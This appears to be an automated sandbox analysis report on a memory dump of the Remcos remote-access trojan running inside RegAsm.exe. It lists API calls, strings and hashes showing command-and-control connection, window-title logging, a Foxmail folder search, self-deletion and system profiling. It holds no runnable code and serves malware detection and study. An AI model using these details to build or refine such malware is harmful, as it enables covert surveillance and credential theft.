                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                          • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                          • Opcode Fuzzy Hash: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                          • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                          APIs
                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                          • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser
                                                          • String ID:
                                                          • API String ID: 4229901323-0
                                                          • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                          • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                          • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                          • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                          Control-flow Graph
                                                          (rendered graph omitted; entry block 40e9c5-40ea47; Windows APIs named in the graph: GetModuleFileNameW, CreateThread, StrToIntA, SetProcessDEPPolicy, DeleteFileW, Sleep)
                                                          APIs
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                            • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                          • API String ID: 2830904901-1349597082
                                                          • Opcode ID: c5560d48c4b391896642b8a9574586e8d49993d434eb5e4215b37992ec499472
                                                          • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                          • Opcode Fuzzy Hash: c5560d48c4b391896642b8a9574586e8d49993d434eb5e4215b37992ec499472
                                                          • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                                          Control-flow Graph
                                                          (rendered graph omitted; entry block 414f2a-414f72; Windows APIs named in the graph: Sleep, WSAGetLastError, GetTickCount, CreateThread)
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$ErrorLastLocalTime
                                                          • String ID: | $%I64u$5.1.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                          • API String ID: 524882891-1990110553
                                                          • Opcode ID: 393f2b5be73a67f98368190a6b19e913f4c8fc589de8849857cca0a622a79bac
                                                          • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                          • Opcode Fuzzy Hash: 393f2b5be73a67f98368190a6b19e913f4c8fc589de8849857cca0a622a79bac
                                                          • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                                          Control-flow Graph
                                                          (rendered graph omitted; entry block 412ab4-412afd; Windows APIs named in the graph: GetModuleFileNameW, Sleep, DeleteFileW)
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CC58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
• Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
• Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
• Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
• Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
• Sleep.KERNEL32(00000064), ref: 00412E94
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$0TG$0TG$NG$NG
• API String ID: 1223786279-2576077980
• Opcode ID: 76d926ec511b1af110b970dbc33056e1a2348894721dd65b52e50139ae7f6007
• Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
• Opcode Fuzzy Hash: 76d926ec511b1af110b970dbc33056e1a2348894721dd65b52e50139ae7f6007
• Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
• lstrlenW.KERNEL32(?), ref: 100014C5
• lstrlenW.KERNEL32(?), ref: 100014E0
• lstrlenW.KERNEL32(?,?), ref: 1000150F
• lstrcatW.KERNEL32(00000000), ref: 10001521
• lstrlenW.KERNEL32(?,?), ref: 10001547
• lstrcatW.KERNEL32(00000000), ref: 10001553
• lstrlenW.KERNEL32(?,?), ref: 10001579
• lstrcatW.KERNEL32(00000000), ref: 10001585
• lstrlenW.KERNEL32(?,?), ref: 100015AB
• lstrcatW.KERNEL32(00000000), ref: 100015B7
Strings
Memory Dump Source
• Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
• Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 0040A740
  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
  • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
• GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
Strings
Memory Dump Source
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID: 8SG$8SG$pQG$pQG$PG$PG
• API String ID: 3795512280-1152054767
• Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
• Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
• Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
• Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Control-flow Graph

APIs
• connect.WS2_32(FFFFFFFF,00F780A0,00000010), ref: 004048E0
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
• WSAGetLastError.WS2_32 ref: 00404A21
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
Strings
Memory Dump Source
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
• Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
• Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
• Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Control-flow Graph

APIs
• __Init_thread_footer.LIBCMT ref: 0040AD38
• Sleep.KERNEL32(000001F4), ref: 0040AD43
• GetForegroundWindow.USER32 ref: 0040AD49
• GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
• Sleep.KERNEL32(000003E8), ref: 0040AE54
  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
Strings
Memory Dump Source
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
• Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
• Opcode Fuzzy Hash: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
• Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Control-flow Graph

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
Strings
Memory Dump Source
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
• Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
• Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
• Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Control-flow Graph

APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
• CloseHandle.KERNEL32(00000000), ref: 0041C459
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
• FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
Strings
Memory Dump Source
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
• String ID: hpF
• API String ID: 1087594267-151379673
• Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
• Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
• Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
• Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Control-flow Graph

APIs
  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
• StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
Strings
Memory Dump Source
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 782494840-2070987746
• Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
• Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
• Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
• Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
APIs
• GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                            • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2099061454-0
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
